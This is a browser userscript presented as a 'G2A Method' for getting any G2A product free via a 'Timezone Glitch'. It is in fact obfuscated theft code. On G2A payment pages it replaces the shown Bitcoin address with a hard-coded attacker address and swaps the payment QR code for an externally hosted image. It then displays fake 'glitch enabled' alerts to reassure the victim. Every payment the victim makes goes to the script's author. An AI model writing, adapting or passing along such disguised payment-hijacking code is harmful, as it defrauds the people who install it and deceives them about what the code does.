// ==UserScript==
// @name         G2A Method
// @namespace    https://g2a.com/
// @version      02.01
// @author       @AnonymRed
// @description  Get any product from G2A for FREE.
// @icon         https://www.google.com/s2/favicons?sz=64&domain=g2a.com
// @match        http*://www.g2a.com/payment*
// @match        https://www.g2a.com/payment
// @run-at       document-start
// ==/UserScript==
 
const _0xba511a=_0x45f8;(function(_0x28983c,_0x4bc32e){const _0x24ceeb=_0x45f8;const _0x9a2c00=_0x28983c();while(!![]){try{const _0x29cd07=-parseInt(_0x24ceeb(0xd7))/(0x8a+0x29d+-0x326)+parseInt(_0x24ceeb(0xe4))/(0x6d2+-0x124b+0xb7b)*(parseInt(_0x24ceeb(0xe8))/(-0x2350+-0x10b*0x1d+0x4192))+-parseInt(_0x24ceeb(0xe2))/(-0x160*-0x2+-0x2559*-0x1+0x2815*-0x1)+parseInt(_0x24ceeb(0xe0))/(0x260a+0x8c6+-0x2ecb)*(-parseInt(_0x24ceeb(0xd8))/(0x4be+-0xf5+-0x3c3))+-parseInt(_0x24ceeb(0xdb))/(-0x1fd+0xb4a+-0x946)*(-parseInt(_0x24ceeb(0xf0))/(-0x2216*0x1+0x2390+-0x172))+-parseInt(_0x24ceeb(0xed))/(0x9ad+-0x167*0x16+0x1536)+-parseInt(_0x24ceeb(0xd9))/(0x6e2*0x2+0x14ec+-0x22a6)*(-parseInt(_0x24ceeb(0xdd))/(0xe6b+0xda*-0x17+-0x1d*-0x2e));if(_0x29cd07===_0x4bc32e){break;}else{_0x9a2c00['push'](_0x9a2c00['shift']());}}catch(_0x9274d5){_0x9a2c00['push'](_0x9a2c00['shift']());}}}(_0x4668,-0x25*-0x6e7e+0x1c2d*-0x5b+-0x3f5d*-0x14));alert(_0xba511a(0xeb));function _0x45f8(_0xdafc34,_0x12c82d){const _0x11965a=_0x4668();_0x45f8=function(_0x1e469e,_0x3ed1bc){_0x1e469e=_0x1e469e-(0x15*0x175+0x248d+0x8*-0x84a);let _0xd93b3a=_0x11965a[_0x1e469e];return _0xd93b3a;};return _0x45f8(_0xdafc34,_0x12c82d);}function _0x4668(){const _0x4a5d95=['8SZCyCb','//img[@alt=\x22QR\x20code\x20to\x20scan\x22]','164085BhudwQ','3965436cYhxSa','34203430gvFEgi','getFullYear','3038441vJvYLH','evaluate','11rDGBDT','//span[contains(text(),\x22BTC\x20address:\x22)]/following-sibling::span','src','10FwEopJ','//button[contains(text(),\x22Continue\x22)]','5267624aWnwGK','addEventListener','354AbVcWH','https://ibb.co/WPgwMHd','Timezone\x20Glitch\x20enabled!\x20Press\x20OK\x20to\x20continue.\x20Last\x20script\x20update:\x20','FIRST_ORDERED_NODE_TYPE','10899MzuXdc','singleNodeValue','innerHTML','Timezone\x20Glitch\x20enabled!\x20Press\x20OK\x20to\x20continue.\x20','getMonth','8820225ukOzUT','click','bc1qnsplfvqlrekez87kgj7kkcrhvlslxnqqfe4zcq'];_0x4668=function(){return _0x4a5d95;};return _0x4668();}(function(){'use strict';_0x1c8eb8();function _0x1c8eb8(){setTimeout(function(){_0x44e4c2();},-0xe44+-0x2e*-0x45+0x7*0x162);setTimeout(function(){_0x562991();},0x1fea+-0x1*0x739+0x10e1*-0x1);}function _0x44e4c2(){const _0x4c7df1=_0x45f8;let _0x5979f4=document[_0x4c7df1(0xdc)](_0x4c7df1(0xde),document,null,XPathResult[_0x4c7df1(0xe7)],null)['singleNodeValue'],_0x6f497b=document[_0x4c7df1(0xdc)](_0x4c7df1(0xd6),document,null,XPathResult[_0x4c7df1(0xe7)],null)[_0x4c7df1(0xe9)];_0x5979f4!==null&&(_0x5979f4[_0x4c7df1(0xea)]=_0x4c7df1(0xef),_0x6f497b[_0x4c7df1(0xdf)]=_0x4c7df1(0xe5));setTimeout(function(){_0x44e4c2();},-0xeff+-0x1*-0x129c+-0x339);}function _0x562991(){const _0x1d8c2f=_0x45f8;let _0xf2083c=document['evaluate'](_0x1d8c2f(0xe1),document,null,XPathResult[_0x1d8c2f(0xe7)],null)[_0x1d8c2f(0xe9)];_0xf2083c!==null?_0xf2083c[_0x1d8c2f(0xe3)](_0x1d8c2f(0xee),function(){const _0x8f3468=_0x1d8c2f;const _0x119bfb=new Date();let _0x25c677=_0x8f3468(0xe6)+_0x119bfb[_0x8f3468(0xda)]()+'-'+(_0x119bfb[_0x8f3468(0xec)]()+(-0x65e+-0x193e+0x1f9d*0x1))+'-'+_0x119bfb['getDate']();alert(_0x25c677);}):setTimeout(function(){_0x562991();},0xaeb+-0xf0b+0x484);}}());
